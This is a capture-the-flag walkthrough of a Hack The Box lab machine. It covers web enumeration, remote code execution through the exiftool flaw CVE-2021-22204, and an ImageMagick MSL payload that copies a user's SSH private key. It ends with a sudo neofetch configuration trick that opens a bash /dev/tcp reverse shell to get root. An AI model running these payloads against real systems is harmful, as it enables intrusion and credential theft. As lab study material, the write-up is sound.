0x01 Introduction#
Target machine IP: 10.10.11.140.
Local machine IP: 10.10.16.6, mac m1.
0x02 Information Gathering#
Only ports 22 and 80 are open during the port scan.
Accessing port 80 on 10.10.11.140 redirects to http://artcorp.htb/, but it is not accessible at the moment. Let's try setting the hosts file and accessing it again.
gobuster vhost -u artcorp.htb -w /Users/grayash/pentesting/web-basic/p12-字典收集/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Accessing metaview, there is a file upload point.
Let's try uploading an image.
Through simple information gathering, it is found that the above image is the content parsed by exiftools.
0x03 Exploitation#
RCE is possible here, with CVE-2021-22204 as the vulnerability identifier.
Exploit:
Since it is difficult to reproduce this vulnerability on a Mac and requires the exiftool tool, switch to Kali for operation.
Kali's IP is: 10.10.14.14.
Set the IP in the exploit to Kali's IP.
Run the exploit file to generate image.jpg.
Start listening on Kali.
nc -nlvp 9090
Access http://dev01.artcorp.htb/metaview/ and upload the generated image.jpg. A successful shell will be obtained.
Set up an interactive terminal.
python3 -c "import pty;pty.spawn('/bin/bash')"
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm
0x04 Privilege Escalation#
The current privilege is www-data, and there is no permission to view the user.txt file.
find / -perm -4000 -type f 2>/dev/null
Use pspy64 to view the running processes on the system and find a sh script convert_images.sh. Let's see what this script contains.
The content is as follows:
The mogrify command is used to create an image according to specified dimensions, blur, crop, dither, etc. Mogrify overwrites the original image file and writes it to a different image file.
Refer to this article:
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html
<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/key`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
Place this SSH key in the .ssh directory under the home directory of Kali, with the filename id_rsa. Make sure that id_rsa has no spaces in its format and the file permission is 400.
Then SSH login using the id_rsa certificate to obtain user.txt.
ssh -i id_rsa [email protected]
Next, escalate to root privileges.
Run sudo -l and find that it has permission to execute the following command.
(root) NOPASSWD: /usr/bin/neofetch \"\"
Run the neofetch command, and the effect is as follows:
According to https://gtfobins.github.io/#neo, if the file is run with sudo privileges, sudo can be used for privilege escalation.
Review the sudo -l configuration file again and find an environment variable XDG_CONFIG_HOME. We can take advantage of this when neofetch reads the configuration file of the environment variable, and write code to reverse shell in the configuration file. When the neofetch program is executed, a shell will be reversed.
The specific steps are as follows:
- Prepare a reverse shell script.
bash -c 'exec bash -i &>/dev/tcp/10.10.14.14/1234 <&1'
- Write it at the beginning of /home/thomas/.config/neofetch/config.conf.
- Import the environment variable.
export XDG_CONFIG_HOME="$HOME/.config"
- Start listening with netcat.
nc -nlvp 1234
- Execute neofetch.
sudo -u root /usr/bin/neofetch \"\"
A shell will be successfully reversed, and root.txt can be obtained.
0x05 Conclusion#
- Couldn't find the target machine for CVE-2021-22204 after searching for a long time. Some of the Docker ones haven't been set up yet. Fortunately, I learned how to exploit the CVE-2021-22204 vulnerability.
- Learned about privilege escalation using ImageMagick.